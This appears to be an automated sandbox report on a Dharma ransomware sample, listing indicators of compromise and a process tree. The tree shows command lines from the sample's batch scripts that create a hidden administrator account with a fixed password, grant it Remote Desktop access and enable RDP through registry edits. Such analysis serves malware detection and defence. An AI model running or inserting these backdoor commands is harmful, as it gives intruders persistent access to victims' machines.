pid Process 1788 mspaint.exe 1788 mspaint.exe 2268 msedge.exe 2268 msedge.exe 3132 msedge.exe 3132 msedge.exe 4304 identity_helper.exe 4304 identity_helper.exe 4236 msedge.exe 4236 msedge.exe 4860 WMIC.exe 4860 WMIC.exe 4860 WMIC.exe 4860 WMIC.exe 3756 WMIC.exe 3756 WMIC.exe 3756 WMIC.exe 3756 WMIC.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 3204 1sass.exe 3204 1sass.exe 3204 1sass.exe 3204 1sass.exe 1820 taskmgr.exe 1820 taskmgr.exe 3204 1sass.exe 3204 1sass.exe 1820 taskmgr.exe 3204 1sass.exe 3204 1sass.exe 3204 1sass.exe 3204 1sass.exe 1820 taskmgr.exe 1820 taskmgr.exe 3204 1sass.exe 3204 1sass.exe 1820 taskmgr.exe 3204 1sass.exe 3204 1sass.exe 3204 1sass.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1820 taskmgr.exe -
Suspicious behavior: LoadsDriver 32 IoCs
pid Process 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe 2232 mssql.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs
pid Process 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeDebugPrivilege 4236 mssql2.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeLoadDriverPrivilege 2232 mssql.exe Token: SeIncreaseQuotaPrivilege 4860 WMIC.exe Token: SeSecurityPrivilege 4860 WMIC.exe Token: SeTakeOwnershipPrivilege 4860 WMIC.exe Token: SeLoadDriverPrivilege 4860 WMIC.exe Token: SeSystemProfilePrivilege 4860 WMIC.exe Token: SeSystemtimePrivilege 4860 WMIC.exe Token: SeProfSingleProcessPrivilege 4860 WMIC.exe Token: SeIncBasePriorityPrivilege 4860 WMIC.exe Token: SeCreatePagefilePrivilege 4860 WMIC.exe Token: SeBackupPrivilege 4860 WMIC.exe Token: SeRestorePrivilege 4860 WMIC.exe Token: SeShutdownPrivilege 4860 WMIC.exe Token: SeDebugPrivilege 4860 WMIC.exe Token: SeSystemEnvironmentPrivilege 4860 WMIC.exe Token: SeRemoteShutdownPrivilege 4860 WMIC.exe Token: SeUndockPrivilege 4860 WMIC.exe Token: SeManageVolumePrivilege 4860 WMIC.exe Token: 33 4860 WMIC.exe Token: 34 4860 WMIC.exe Token: 35 4860 WMIC.exe Token: 36 4860 WMIC.exe Token: SeIncreaseQuotaPrivilege 4860 WMIC.exe Token: SeSecurityPrivilege 4860 WMIC.exe Token: SeTakeOwnershipPrivilege 4860 WMIC.exe Token: SeLoadDriverPrivilege 4860 WMIC.exe Token: SeSystemProfilePrivilege 4860 WMIC.exe Token: SeSystemtimePrivilege 4860 WMIC.exe Token: SeProfSingleProcessPrivilege 4860 WMIC.exe Token: SeIncBasePriorityPrivilege 4860 WMIC.exe Token: SeCreatePagefilePrivilege 4860 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3524 SearchHost.exe 3524 SearchHost.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3132 msedge.exe 3524 SearchHost.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe 1820 taskmgr.exe -
Suspicious use of SetWindowsHookEx 9 IoCs
pid Process 1788 mspaint.exe 1788 mspaint.exe 1788 mspaint.exe 1788 mspaint.exe 2232 mssql.exe 4236 mssql2.exe 3524 SearchHost.exe 2232 mssql.exe 3132 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3132 wrote to memory of 4024 3132 msedge.exe 91 PID 3132 wrote to memory of 4024 3132 msedge.exe 91 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 1068 3132 msedge.exe 92 PID 3132 wrote to memory of 2268 3132 msedge.exe 93 PID 3132 wrote to memory of 2268 3132 msedge.exe 93 PID 3132 wrote to memory of 544 3132 msedge.exe 94 PID 3132 wrote to memory of 544 3132 msedge.exe 94 PID 3132 wrote to memory of 544 3132 msedge.exe 94 PID 3132 wrote to memory of 544 3132 msedge.exe 94 PID 3132 wrote to memory of 544 3132 msedge.exe 94 PID 3132 wrote to memory of 544 3132 msedge.exe 94 PID 3132 wrote to memory of 544 3132 msedge.exe 94 PID 3132 wrote to memory of 544 3132 msedge.exe 94 PID 3132 wrote to memory of 544 3132 msedge.exe 94 PID 3132 wrote to memory of 544 3132 msedge.exe 94 PID 3132 wrote to memory of 544 3132 msedge.exe 94 PID 3132 wrote to memory of 544 3132 msedge.exe 94 PID 3132 wrote to memory of 544 3132 msedge.exe 94 PID 3132 wrote to memory of 544 3132 msedge.exe 94 PID 3132 wrote to memory of 544 3132 msedge.exe 94 PID 3132 wrote to memory of 544 3132 msedge.exe 94 PID 3132 wrote to memory of 544 3132 msedge.exe 94 PID 3132 wrote to memory of 544 3132 msedge.exe 94 PID 3132 wrote to memory of 544 3132 msedge.exe 94 PID 3132 wrote to memory of 544 3132 msedge.exe 94 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4860 attrib.exe
Processes
-
C:\Windows\system32\mspaint.exe"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\AppData\Local\Temp\b231263f-0b92-4f02-9e71-3d6a05534490.jpg"1⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1788
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService1⤵PID:2224
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x144,0x148,0x14c,0x120,0x150,0x7fff903646f8,0x7fff90364708,0x7fff903647182⤵PID:4024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:22⤵PID:1068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:32⤵
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
PID:2268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:82⤵PID:544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3592 /prefetch:12⤵PID:4464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3600 /prefetch:12⤵PID:1688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:12⤵PID:1120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2840 /prefetch:12⤵PID:4544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3600 /prefetch:82⤵PID:2344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3600 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:12⤵PID:3852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4580 /prefetch:12⤵PID:868
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:12⤵PID:4656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4580 /prefetch:12⤵PID:3288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:12⤵PID:4900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:12⤵PID:4752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:12⤵PID:4464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:12⤵PID:744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:12⤵PID:1904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6108 /prefetch:82⤵PID:1460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:12⤵PID:2276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:12⤵PID:4916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4228 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2088,11218442354131105479,1821262018158688363,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6628 /prefetch:82⤵PID:4576
-
-
C:\Users\Admin\Downloads\Dharma.exe"C:\Users\Admin\Downloads\Dharma.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:464 -
C:\Users\Admin\Downloads\ac\nc123.exe"C:\Users\Admin\Downloads\ac\nc123.exe"3⤵
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
PID:1648 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cls4⤵
- System Location Discovery: System Language Discovery
PID:2060
-
-
-
C:\Users\Admin\Downloads\ac\mssql.exe"C:\Users\Admin\Downloads\ac\mssql.exe"3⤵
- Sets service image path in registry
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2232
-
-
C:\Users\Admin\Downloads\ac\mssql2.exe"C:\Users\Admin\Downloads\ac\mssql2.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ac\Shadow.bat" "3⤵
- System Location Discovery: System Language Discovery
PID:216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ac\systembackup.bat" "3⤵
- System Location Discovery: System Language Discovery
PID:5044 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="4⤵
- System Location Discovery: System Language Discovery
PID:3480 -
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4860
-
-
C:\Windows\SysWOW64\find.exeFind "="5⤵
- System Location Discovery: System Language Discovery
PID:5068
-
-
-
C:\Windows\SysWOW64\net.exenet user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"4⤵
- System Location Discovery: System Language Discovery
PID:3340 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"5⤵
- System Location Discovery: System Language Discovery
PID:3276
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators systembackup /add4⤵
- System Location Discovery: System Language Discovery
PID:464 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators systembackup /add5⤵
- System Location Discovery: System Language Discovery
PID:4080
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="4⤵
- System Location Discovery: System Language Discovery
PID:4044 -
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3756
-
-
C:\Windows\SysWOW64\find.exeFind "="5⤵
- System Location Discovery: System Language Discovery
PID:1112
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" systembackup /add4⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
PID:3792 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add5⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
PID:2824
-
-
-
C:\Windows\SysWOW64\net.exenet accounts /forcelogoff:no /maxpwage:unlimited4⤵
- System Location Discovery: System Language Discovery
PID:2060 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited5⤵
- System Location Discovery: System Language Discovery
PID:1668
-
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f4⤵
- System Location Discovery: System Language Discovery
PID:4316
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f4⤵
- System Location Discovery: System Language Discovery
PID:3212
-
-
